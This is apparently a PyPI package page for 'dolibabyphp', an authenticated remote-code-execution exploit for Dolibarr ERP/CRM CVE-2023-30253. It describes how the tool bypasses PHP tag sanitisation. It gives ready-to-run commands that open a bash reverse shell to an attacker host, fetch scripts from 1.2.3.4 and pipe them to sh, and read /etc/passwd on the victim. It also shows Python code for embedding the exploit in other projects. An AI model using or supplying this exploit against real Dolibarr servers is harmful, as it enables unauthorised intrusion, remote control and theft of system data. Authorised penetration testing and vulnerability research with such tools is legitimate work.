An authenticated RCE exploit for Dolibarr ERP/CRM CVE-2023-30253.
Project description
DolibabyPhp
An authenticated RCE exploit for Dolibarr ERP/CRM CVE-2023-30253.
Installation
You can either install the package from the PyPi repository with pip
or git clone
the source directly from GitHub.
pip install dolibabyphp
Usage
Usage: dolibabyphp [OPTIONS] TARGET_URL USERNAME PASSWORD COMMAND [ARGS]...
This exploit will log into the Dolibarr web server at the specified target URL
with the provided username and password. After that it will attempt to create
a web page with a unique name. Once created, it will modify the web page to
include the custom PHP code bypassing the sanitation check by not using only
lowercase letters (e.g. PHP or pHp instead of php). There are multiple
payloads to choose from After the payload has finished running, the web page
will be deleted.
Options:
--site-name TEXT Specify a name to use when creating a site on the
target. Defaults to UUIDv4.
--page-name TEXT Specify a name to use when creating a page on the
target. Defaults to UUIDv4.
--page-title TEXT Specify a title for the page. Defaults to the page
name.
--proxy TEXT Specify a proxy URL for use in all requests.
-o, --output FILENAME Specify a file path to output the results of the
payload to. Defaults to stdout.
-h, --help Show this message and exit.
Commands:
bash-reverse-shell Spawns a bash shell on the victim machine and...
cleanup Runs the cleanup script on the target for given site...
curl-pipe Curl a file and pipe it to another command.
custom-php-payload Specify your own PHP payload to be run on the victim...
custom-system-payload Specify your own payload to be run via PHP system()...
sftp SFTPs to the attacker machine, downloads the...
wget Downloads the file at the specified URL to to the...
Examples
Here are some examples of how to use the CLI.
# Reverse shell with Bash.
dolibabyphp http://example.com/ username1 pass_word23 bash-reverse-shell --lhost 1.2.3.4 --lport 4444
# Custom payload with a proxy.
dolibabyphp --proxy http://127.0.0.1:8080 http://example.com/ username1 pass_word23 custom-system-payload --payload "uname -a"
# SFTP and execute payload with output written to a file.
dolibabyphp -o ./linpeas-output.txt http://example.com/ username1 pass_word23 sftp --private-key-file ./id_ed25519 sftp://me@1.2.3.4:2222/linpeas.sh ./style.css
# Curl payload and pipe it to sh.
dolibabyphp -o ./linpeas-output.txt http://example.com/ username1 pass_word23 curl-pipe https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
From Python
If you want to integrate this exploit into another Python project, you can just import it.
from dolibabyphp import Exploit, furl, php_system, open_file, cleanup_site
from time import sleep
exploit = Exploit(
target_url=furl('http://example.com'),
username="username1",
password="pass_word23",
)
# You can get the result of the payload directly from the exploit.
result = exploit.run(php_system('cat /etc/passwd'))
users = list(map(lambda acct: acct.split(':')[0], result.output.split('\n')))
# If cleanup fails, we can just try again.
while not result.cleaned_up:
time.sleep(30) # wait a bit before trying cleanup again
result.cleanup()
# You can also have it write the result to a file.
with open_file('./exploit-output.txt', 'w', lazy=True) as file:
# You can reuse the same Exploit instance.
exploit.output = file
# The site_name and page_name do not change automatically.
result = exploit.run(php_system('curl http://1.2.3.4/myscript.sh | sh'))
Running from source
In order to run the project from the source code, you can either use rye run
or make sure you add the src/
directory to the PYTHONPATH
and then import the module dolibabyphp
with the -m
flag.
# With rye
rye run dolibabyphp
# Without rye
PYTHONPATH="$(pwd)/src/" python -m dolibabyphp
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file dolibabyphp-1.2.0.tar.gz
.
File metadata
- Download URL: dolibabyphp-1.2.0.tar.gz
- Upload date:
- Size: 23.8 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.12.3
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 033a5769f668ffa999010772fe7e1b1ad6fd3b8b35a915040dbd79fda1b3dcad |
|
MD5 | 616062187f5357ac18f23b53c872b6ab |
|
BLAKE2b-256 | 649e3bf41978694c0aca4a86464ac586a8b4475dea6119283fd249094415af7e |
File details
Details for the file dolibabyphp-1.2.0-py3-none-any.whl
.
File metadata
- Download URL: dolibabyphp-1.2.0-py3-none-any.whl
- Upload date:
- Size: 14.8 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.12.3
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 344a24ad15794d94fb95dcf9d01c62c68911f2f7ade9946b0519da7db7cc86d8 |
|
MD5 | 159c8c47a940779a2c2ae975c223c65e |
|
BLAKE2b-256 | 6de2df658f07b43021c7a410e961fb48e2b4841627d4e3d2ef71239ac842b051 |